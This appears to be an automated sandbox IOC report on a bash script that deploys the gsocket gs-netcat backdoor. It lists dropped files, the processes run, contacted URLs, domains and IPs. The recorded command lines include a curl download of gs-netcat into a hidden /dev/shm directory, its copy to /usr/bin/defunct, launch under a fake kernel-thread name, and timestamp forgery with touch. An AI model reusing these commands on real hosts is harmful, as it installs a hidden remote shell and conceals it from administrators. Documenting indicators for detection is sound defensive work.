IOC Report
y

loading gif

Files

File Path
Type
Category
Malicious
y
Bourne-Again shell script, ASCII text executable
initial sample
 malicious
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
dropped
 malicious
/usr/bin/defunct
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
dropped
 malicious

Processes

Path
Cmdline
Malicious
/usr/bin/bash
/usr/bin/bash /tmp/y
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/uname
uname -m
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/base64
base64 -w0
/usr/bin/bash
-
/usr/bin/base64
base64 -d
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/sed
sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/pgrep
pgrep defunct
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/pgrep
pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
/usr/bin/bash
-
/usr/bin/bash
-
/bin/bash
/bin/bash -c "echo TRUE"
/usr/bin/bash
-
/usr/bin/dirname
dirname /dev/shm/.gs-0
/usr/bin/bash
-
/usr/bin/dirname
dirname /dev/shm
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/date
date -r /dev/shm +%Y%m%d%H%M.%S
/usr/bin/bash
-
/usr/bin/dirname
dirname /dev/shm/.gs-0
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/ls
ls -atr /dev/shm
/usr/bin/bash
-
/usr/bin/head
head -n1
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/date
date -r /dev/shm/.. +%Y%m%d%H%M.%S
/usr/bin/bash
-
/usr/bin/mkdir
mkdir /dev/shm/.gs-0
/usr/bin/bash
-
/usr/bin/chmod
chmod 700 /dev/shm/.gs-0
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/touch
touch /dev/shm/.gs-0/.gs-rw.lock
/usr/bin/bash
-
/usr/bin/rm
rm -f /dev/shm/.gs-0/.gs-rw.lock
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/date
date -r /usr/bin +%Y%m%d%H%M.%S
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/ls
ls -atr /usr/bin
/usr/bin/bash
-
/usr/bin/head
head -n1
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/date
date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S
/usr/bin/bash
-
/usr/bin/touch
touch /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/chmod
chmod 600 /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/basename
basename /bin/true
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/base64
base64 -w0
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/base64
base64 -w0
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/base64
base64 -w0
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/curl
curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
/usr/bin/bash
-
/usr/bin/mv
mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/rm
rm -f /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/dirname
dirname /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/touch
touch /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/chmod
chmod 600 /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/cp
cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/dirname
dirname /dev/shm/.gs-0/gs-netcat
/usr/bin/bash
-
/usr/bin/rm
rm -f /dev/shm/.gs-0/gs-netcat
/usr/bin/bash
-
/usr/bin/chmod
chmod 700 /usr/bin/defunct
/usr/bin/bash
-
/usr/bin/bash
-
/usr/bin/defunct
/usr/bin/defunct -g
/usr/bin/bash
-
/usr/bin/defunct
[slub_flushwq]
/usr/bin/bash
-
/usr/bin/rm
rm -rf /dev/shm/.gs-0/*
/usr/bin/bash
-
/usr/bin/rmdir
rmdir /dev/shm/.gs-0
/usr/bin/bash
-
/usr/bin/touch
touch -t 202410010411.39 /dev/shm
/usr/bin/bash
-
/usr/bin/touch
touch -t 202109170423.51 /usr/bin
/usr/bin/bash
-
/usr/bin/touch
touch -t 200611251713.29 /usr/bin/defunct
There are 168 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.gsocket.io/deploy/
unknown
 malicious
https://cdn.gsocket.io
unknown
 malicious
https://github.com/hackerschoice/gsocket-relay
unknown
 malicious
https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64
92.60.39.208
 malicious
https://foo.blah/log.php?s=
unknown
https://gsocket.io
unknown
https://t.me/thcorg$
unknown
https://webhook.site
unknown
https://github.com/hackerschoice/gsocket/releases$
unknown
https://webhook.site/$
unknown
https://api.telegram.org/bot$
unknown
https://discord.com/api/webhooks/$
unknown
https://gsocket.io/x)
unknown
There are 3 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cdn.gsocket.io
92.60.39.208
c.gs.thc.org
45.14.164.3

IPs

IP
Domain
Country
Malicious
92.60.39.208
cdn.gsocket.io
Germany
109.202.202.202
unknown
Switzerland
45.14.164.3
c.gs.thc.org
Germany
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom